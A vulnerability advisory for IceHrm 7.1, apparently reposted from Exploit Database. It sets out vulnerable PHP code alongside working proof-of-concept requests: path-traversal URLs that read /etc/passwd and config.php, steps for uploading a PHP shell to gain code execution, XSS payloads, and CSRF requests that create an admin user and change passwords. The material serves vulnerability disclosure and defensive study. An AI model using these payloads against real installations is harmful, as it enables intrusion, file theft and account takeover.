IceHrm 7.1 – Multiple Vulnerabilities

• Exploit Database
• 15 阅读

• 作者： LiquidWorm
  日期： 2014-12-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35490/

• 
  IceHrm <=7.1 Multiple Vulnerabilities
  
  
  Vendor: IceHRM
  Product web page: http://www.icehrm.com
  Affected version: <= 7.1
  
  
  Summary: IceHrm is Human Resource Management web software
  for small and medium sized organizations. The software is
  written in PHP. It has community (free), commercial and
  hosted (cloud) solution.
  
  Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities
  including Local File Inclusion, Cross-Site Scripting, Malicious
  File Upload, Cross-Site Request Forgery and Code Execution.
  
  Tested on: Apache/2.2.15 (Unix)
   PHP/5.3.3
   MySQL 5.1.73
  
  
  Vulnerabilities discovered by Stefan 'sm' Petrushevski
  @zeroscience
  
  
  Advisory ID: ZSL-2014-5215
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php
  
  
  01.12.2014
  
  ---
  
  
  1. Local File Inclusion (LFI) 
  #####################################################
  File: 
  app/index.php
  
  Vulnerable code:
  ---- snip ----
  include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php';
  app/?g=../&n=../../../../etc/passwd%00
  ---- snip ----
  
  Proof of Concept (PoC):
  http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00
  
  Severity:CRITICAL
  #####################################################
  
  
  2. Local File Inclusion (LFI)
  #####################################################
  File:
  service.php
  
  Vulnerable code:
  ---- snip ----
  if($action == 'download'){
  	$fileName = $_REQUEST['file'];
  	$fileName = CLIENT_BASE_PATH.'data/'.$fileName;
  	header('Content-Description: File Transfer');
  	header('Content-Type: application/octet-stream');
  	header('Content-Disposition: attachment; filename='.basename($fileName));
  	header('Content-Transfer-Encoding: binary');
  	header('Expires: 0');
  	header('Cache-Control: must-revalidate');
  	header('Pragma: public');
  	header('Content-Length: ' . filesize($fileName));
  	ob_clean();
  	flush();
  	readfile($fileName);
  ---- snip ----
  
  Proof of Concept (PoC):
  http://zsltest/icehrm/app/service.php?a=download&file=../config.php
  
  Severity:CRITICAL
  #####################################################
  
  
  3. Malicious File Upload / Code Execution
  #####################################################
  File:
  fileupload.php 
  
  Vulnerable code:
  ---- snip ----
  //Generate File Name
  $saveFileName = $_POST['file_name'];
  if(empty($saveFileName) || $saveFileName == "_NEW_"){
  	$saveFileName = microtime();
  	$saveFileName = str_replace(".", "-", $saveFileName);	
  }
  
  $file = new File();
  $file->Load("name = ?",array($saveFileName));
  
  // list of valid extensions, ex. array("jpeg", "xml", "bmp")
  
  $allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg");
  // max file size in bytes
  $sizeLimit =MAX_FILE_SIZE_KB * 1024;
  $uploader = new qqFileUploader($allowedExtensions, $sizeLimit);
  $result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName);
  // to pass data through iframe you will need to encode all html tags
  
  if($result['success'] == 1){
  	$file->name = $saveFileName;
  	$file->filename = $result['filename'];
  	$file->employee = $_POST['user']=="_NONE_"?null:$_POST['user'];
  	$file->file_group = $_POST['file_group'];
  	$file->Save();
  	$result['data'] = CLIENT_BASE_URL.'data/'.$result['filename'];
  	$result['data'] .= "|".$saveFileName;
  	$result['data'] .= "|".$file->id;
  }
  ---- snip ----
  
  Proof of Concept (PoC) method:
  1. Change the 'file_name' request parameter in desired filename. The file will be saved in 'data' folder.
  Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt
  2. Create a malicious file (php shell) save it with .txt extension
  3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in ‘data’ folder as dsadsa.php.txt.
  4. Access the file – http://zsltest/icehrm/data/dsadsa.php.txt to execute the php code.
  
  PoC example:
  1. http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1
  2. xxx.txt contents:
  <?php phpinfo(); ?>
  3. Upload the filename
  4. Access the file:
  
  Severity:CRITICAL
  #####################################################
  
  
  4. Cross-Site Scripting (XSS)
  #####################################################
  File:
  login.php
  
  Vulnerable code:
  ---- snip ----
  <script type="text/javascript">
  	var key = "";
  <?php if(isset($_REQUEST['key'])){?>
  	key = '<?=$_REQUEST['key']?>';
  	key = key.replace(/ /g,"+");
  <?php }?>
  ---- snip ----
  
  Proof of Concept (PoC):
  http://zsltest/icehrm/app/login.php?key=';</script><script>alert(‘zsl’);</script>
  
  Severity:MEDIUM
  #####################################################
  
  
  5. Cross-Site Scripting (XSS)
  #####################################################
  File:
  fileupload_page.php
  
  Vulnerable code:
  ---- snip ----
  <div id="upload_form">
  <form id="upload_data" method="post" action="<?=CLIENT_BASE_URL?>fileupload.php" enctype="multipart/form-data">
  <input id="file_name" name="file_name" type="hidden" value="<?=$_REQUEST['id']?>"/>
  <input id="file_group" name="file_group" type="hidden" value="<?=$_REQUEST['file_group']?>"/>
  <input id="user" name="user" type="hidden" value="<?=$_REQUEST['user']?>"/>
  <label id="upload_status"><?=$_REQUEST['msg']?></label><input id="file" name="file"type="file" onChange="if(checkFileType('file','<?=$fileTypes?>')){uploadfile();}"></input>
  …
  ---- snip ----
  
  Vulnerable parameters: id, file_group, user, msg
  
  Proof of Concept (PoC):
  http://zsltest/icehrm/fileupload_page.php?id=XXXX%22%3E%3Cscript%3Ealert(‘zsl’)%3C/script%3E
  
  Severity:MEDIUM
  #####################################################
  
  
  6. Information Disclosure / Leaking Sensitive User Info
  #####################################################
  Users’/employees’ profile images are easily accessible in the ‘data’ folder.
  
  Proof of Concept (PoC):
  http://192.168.200.119/icehrm/app/data/profile_image_1.jpg
  http://192.168.200.119/icehrm/app/data/profile_image_X.jpg <- x=user id
  
  Severity:LOW
  #####################################################
  
  
  7. Cross-Site Request Forgery (CSRF)
  #####################################################
  All forms are vulnerable to CSRF.
  
  Documents library:
  http://localhost/icehrm/app/service.php
  POST 
  document=2&valid_until=&status=Inactive&details=detailz&attachment=attachment_evi4t3VuKqDfyY&a=add&t=EmployeeDocument
  
  Personal info:
  http://localhost/icehrm/app/service.php
  GET 
  t=Employee
  a=ca
  sa=get
  mod=modules=employees
  req={"map":"{\"nationality\":[\"Nationality\",\"id\",\"name\"],\"employment_status\":[\"EmploymentStatus\",\"id\",\"name\"],\"job_title\":[\"JobTitle\",\"id\",\"name\"],\"pay_grade\":[\"PayGrade\",\"id\",\"name\"],\"country\":[\"Country\",\"code\",\"name\"],\"province\":[\"Province\",\"id\",\"name\"],\"department\":[\"CompanyStructure\",\"id\",\"title\"],\"supervisor\":[\"Employee\",\"id\",\"first_name+last_name\"]}"}
  
  Add new admin user:
  http://localhost/icehrm/app/service.php
  POST
  username=test5&email=test5%40zeroscience.mk&employee=1&user_level=Admin&a=add&t=User
  
  Change password of user:
  http://localhost/icehrm/app/service.php?
  GET
  t=User
  a=ca
  sa=changePassword
  mod=admin=users
  req={"id":5,"pwd":"newpass"}
  
  Add/edit modules:
  http://localhost/icehrm/app/service.php
  POST
  t=Module&a=get&sm=%7B%7D&ft=&ob=
  
  Severity:LOW
  #####################################################